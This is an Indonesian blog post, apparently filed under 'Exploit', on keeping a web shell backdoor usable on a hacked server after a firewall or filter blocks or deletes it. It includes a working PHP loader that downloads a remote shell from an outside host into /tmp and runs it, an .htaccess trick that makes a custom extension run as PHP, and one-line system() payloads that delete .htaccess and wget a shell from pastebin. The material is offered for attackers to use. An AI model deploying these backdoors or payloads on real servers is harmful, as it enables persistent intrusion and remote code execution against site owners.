Notifikasi
Tidak ada notifikasi baru.
Beranda Exploit

Bypass Shell Backdoor: Terdownload, Forbidden

admin
admin
---
Bypass Shell Backdoor

Shell Backdoor merupakan arsip yg ditanamkan sang attacker ke server pada kegiatan hacking. umumnya shell backdoor didesain menggunakan format php, asp, phtml, namun tidak menutup kemungkinan shell backdoor memiliki extensi yang lain. Shell backdoor sendiri punya beberapa fungsi, yaitu:

  1. menerima akses lebih terhadap website
  2. menjadi jalur belakang hacker buat masuk pulang (tanpa exploitasi ulang
  3. Meracuni website dengan code dursila agar terjadi kerusakan di website

pada beberapa masalah saat kita ingin mengakses shell backdoor pada target, shell yang kita upload seringkali kali terdownload, wongkudus memiliki beberapa teknik untuk bypass.

Mengatasi Shell Backdoor yg Forbidden serta Terhapus

terdapat beberapa penyebab shell backdoor forbidden atau terhapus, salah  satunya merupakan penggunaan filter dimana melakukan block di script eksklusif. masalah ini dapat diatasi menggunakan menggunakan shell tmp atau marijuana. buat source codenya mirip berikut.

Menggunakan Tmp Shell Backdoor 

<?php

# IndoXploit TMP Backdoor

# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)

# Coded by: L0c4lh34rtz - IndoXploit


$data = ['https://www.indoxploit.or.id/repository/indoxploit_v3.txt', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];


if(file_exists($data[1]) && filesize($data[1]) !== 0) {

    include($data[1]);

} else {

    $fopen = fopen($data[1], 'w+');

    fwrite($fopen, get($data[0]));

    fclose($fopen);

    echo '<script>window.location="?indoxploit";</script>';

}


function get($url) {

    $ch = curl_init();

          curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

          curl_setopt($ch, CURLOPT_URL, $url);

          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

    return curl_exec($ch);

          curl_close($ch);

}

?>

Kalian bisa mengubah link shell backdoor indoxploit dengan link shell kalian (dalam bentuk txt)

Menggunakan Marijuana Shell Backdoor

Download 

selain bisa bypass marijuana memiliki keunggulan sendiri yaitu encode decode base64.

Mengatasi Shell Backdoor yang Terdownload

Selain Forbidden terdapat pula perkara shell yang terdownload waktu diakses hal ini acapkali disebabkan oleh .htaccess tetapi terdapat jua yg memang tak mampu dibypass mirip masalah dimana arsip terupload pada aws ataupun didownload menggunakan script php. Berikut teknik teknik buat bypass shell backdoor yg terdownload

 Bypass Shell Backdoor dengan Override .htaccess

buat arsip menggunakan nama .htaccess menggunakan isi sebagai berikut

AddType application/x-httpd-php .child

  • Upload ke server target, Bila tak mampu terupload coba pakai burp serta ganti ext
  • Siapkan Shell Marijuana dan rename menjadi Marijuana.child
  • Upload Shell Marijuana.child lalu coba akses

Bypass Shell Backdoor dengan One Line Shell

  • buat file child.php
  • Isi nakanosec.php dengan payload dibawah

system("id")

?>

  • Upload ke server sasaran
  • Shell akan terdownload akan tetapi command akan tereksekusi
  • untuk upload shell remove dulu .htaccess dengan payload berikut 

system("rm .htaccess")

?>

  • lalu buat uploadnya gunakan payload berikut

system("wget https://pastebin.com/raw/JU2DtsqP -O child.php")

?>


Exploit
Gabung dalam percakapan
Posting Komentar